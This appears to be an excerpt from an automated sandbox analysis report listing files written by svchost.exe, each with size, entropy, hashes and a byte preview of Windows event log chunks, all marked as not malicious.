                                                SHA-256:1B59C5A37BE2DBE549E68B6499A053CDE94DF1241B696EB034BE402E2D47D957
                                                SHA-512:085CDF21EBE7A11BFF5B360814E4C22DDB85C890BA618BB45619E972FA7B969CDDF53C097EC403F1F932FF15920CAAF1265B2F1A5AFA8B1BAEFA55A29AC673CF
                                                Malicious:false
                                                Preview:ElfChnk.........%...............%............E..`G...x.~.......................................................................O................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.3069197485541766
                                                Encrypted:false
                                                SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                Malicious:false
                                                Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):127536
                                                Entropy (8bit):4.000638990534209
                                                Encrypted:false
                                                SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqZh0w+qLpBVi7CPME79nCxkSq0c:c0w+qtBViw0w+qtBViLc
                                                MD5:CBA05F4DF34CB00322596BDDEA6994FB
                                                SHA1:60FF2919B4741195EEC42C8E46DC4112C84C699D
                                                SHA-256:4F26DE6CFD8E0DA3228CEE5A3F7DADC41810BF2D79E1D5719668D56195CE462A
                                                SHA-512:4B4A5906C3369A5B2581258073F74C0AA0B34F5D35FC99EC565D764C18BF36A76E70B2A21E6E3042A6CF22E99C54693AF660B09A069E098B0254D5764D7F649E
                                                Malicious:false
                                                Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.2909571978750325
                                                Encrypted:false
                                                SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                Malicious:false
                                                Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.488768580471203
                                                Encrypted:false
                                                SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                Malicious:false
                                                Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):71936
                                                Entropy (8bit):4.4964801720773035
                                                Encrypted:false
                                                SSDEEP:1536:UOop9cviC6xO3yTEcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfA:UOopWviC6xO3yTEcRFkL1TWX0gkB/J7I
                                                MD5:54B982553A48FFEA14EEC33F3792D3D8
                                                SHA1:8CF470A6E4E551F3ED905C171C618E3521C8A74E
                                                SHA-256:043857BED1821131AF6571FA8DE2691063996A6684532FF7828D345E24A19B26
                                                SHA-512:BE4747FF036DA36DFCE40C5DE3C3DDF6695286FCA239F5029F02C9FE11CF40D868563460A945DD90596F389064317D4F7A4B7799021AD97A89CB6F57696DE27F
                                                Malicious:false
                                                Preview:ElfChnk.>...............>......................`...?.S.....................................................................5Nx}................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**..x...........>.................&...............................................................8.......P.....!....nqm......... >.........&O......'O.....................................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L.~.........n30'x...**..(...........0. ...............&...............................................................8.......P.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):66976
                                                Entropy (8bit):4.478017396168738
                                                Encrypted:false
                                                SSDEEP:384:d7h7EhN7s7o787l7r787a7J7z7+7N17g7E7h7g7gY7hZ7D7k7F7r7wm7NP7Y7+7I:E9ruCg
                                                MD5:0B4B59A5FECEB03C410B3C93102C053C
                                                SHA1:F79228C77A2A4F41BB3B000AE811BC3F9A899195
                                                SHA-256:CF72756984B9F752D1D59E523CAA9063216FE6D4A01C55FC019CEFB6D91263BD
                                                SHA-512:B019A2B11F61C0A41EA959B398AF40F036AFE4213077EEDD1AF7776284336990CE2DCBDD6C73F0CBE003672B80A48E89D916B1131656CF0AF380B19229E68E84
                                                Malicious:false
                                                Preview:ElfChnk.Y.......g.......Y.......g............%...&..;7......................................................................:|.U............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......f........-................................................................................f.......~.....!.....z..........@.-........&O......'O....x.......f........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n.B.....K..p...1.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l......Ls..............**......g........'......
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.1499045494600955
                                                Encrypted:false
                                                SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                Malicious:false
                                                Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8164696340947971
                                                Encrypted:false
                                                SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                Malicious:false
                                                Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9855903635327656
                                                Encrypted:false
                                                SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                Malicious:false
                                                Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.165454452307923
                                                Encrypted:false
                                                SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                MD5:B6B6F199DA64422984403D7374F32528
                                                SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                Malicious:false
                                                Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.8519554794255333
                                                Encrypted:false
                                                SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                Malicious:false
                                                Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.1642919553794224
                                                Encrypted:false
                                                SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                MD5:D7EECF043241FDB9486580582E208603
                                                SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                Malicious:false
                                                Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):79000
                                                Entropy (8bit):4.55510563321521
                                                Encrypted:false
                                                SSDEEP:768:bcxeIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbek:u+Jao7mce8pX
                                                MD5:5007FEDEAACF1545A5747D454B5B3109
                                                SHA1:F47E137758B9F7BBF36BADAE3E4D04E5FB12B204
                                                SHA-256:1868FBD58403951E7F8B61C2BA20BBC4834AF97BA14A6A6DE6D595FCC7BCBA78
                                                SHA-512:DC56445BA220CDB83A18002773A051312DFD00369CB830063089AFBA8EF9F79A221077ECE7E32CE231A18FE61B72F90453ED56CCE89A73793A13DA39A0FF71A3
                                                Malicious:false
                                                Preview:ElfChnk.....................................p..........:.....................................................................A..........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........n=...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                Category:dropped
                                                Size (bytes):79016
                                                Entropy (8bit):1.81989573221711
                                                Encrypted:false
                                                SSDEEP:384:y+hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmBWUmYhL6UsE0Z9:pY7LE7Y7LE
                                                MD5:336B4F255BBBA118F1CC4A04EC34D2A1
                                                SHA1:61F64DE2A6D31F7BD071C2EF693D49F47654C8A8
                                                SHA-256:8215E74F9BECDDD5DE236126AC1F143DBBE03D2B32DF137F53C872EE2AD969C1
                                                SHA-512:8199BAF45ADE92B98C8C105EE7A34F1C8183BC50DE8E4ABFED4ADCD7C70BF4AFFB573B58D9C620C812FDF98ECA710951C9B50789C511AD485468DCA8D15DB316
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................\>.eElfChnk....................................../..(4....p.....................................................................>................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67776
                                                Entropy (8bit):0.36782084694512096
                                                Encrypted:false
                                                SSDEEP:96:riKNVaO80obuQ/6FgMiKNVaO80obuQ/6Fg:ri8V7hQiFgMi8V7hQiFg
                                                MD5:E1D28FE11F076E8765F1EB3C642FC1AF
                                                SHA1:7119CE23954CDFB42077260FBA4DD5D2DAFDA323
                                                SHA-256:E46D254C92DD13D7DE78FA472C41BE690B07A5AA314F0AD87D4DB5231371DB52
                                                SHA-512:3C6D60B5D816204D237942023F9FFBE518C929CCDA71D5368131B0DE0375254ABB47820B5956B287F69DDEFC3550F0813939FE7E3795D7B5E4D8DD5FB0364939
                                                Malicious:false
                                                Preview:ElfChnk..............................................n ........................................................................!................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............^.................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.6469884746870727
                                                Encrypted:false
                                                SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                Malicious:false
                                                Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):85184
                                                Entropy (8bit):4.319058147736503
                                                Encrypted:false
                                                SSDEEP:768:41ja0N9a7ajaLa/aDaTarakacaAaEaeaeaMapadaFa6aGaQala5aE1ja0N9a7ajG:4ZNbZNK
                                                MD5:F940B772D0BCAE5075AA453132618976
                                                SHA1:204A659CE0D67E6FC30658BCC301A6DE981B400E
                                                SHA-256:2A5597165E91B0E8A56EB6BB962A3E2324B692238D2E260D906D5E66E7245B44
                                                SHA-512:5053C12E2735FFBAA31ACF11CC21B7A3E606E13DAA79811B54B7C508DC6BF96FF614E37F7BE3818E8CD54B8DB915A17C351C4AD66FBB991E2D7BE6FC9627921B
                                                Malicious:false
                                                Preview:ElfChnk......................................I...L..(..s.....................................................................*.o................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..X............J................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.3132453844344478
                                                Encrypted:false
                                                SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                MD5:6237EE0458A0478242B975E9BB7AA97D
                                                SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                Malicious:false
                                                Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.325262033408211
                                                Encrypted:false
                                                SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                MD5:D13189B45679E53F5744A4D449F8B00F
                                                SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                Malicious:false
                                                Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7947046118743749
                                                Encrypted:false
                                                SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                MD5:55E73A924B170FBFFF862E8E195E839A
                                                SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
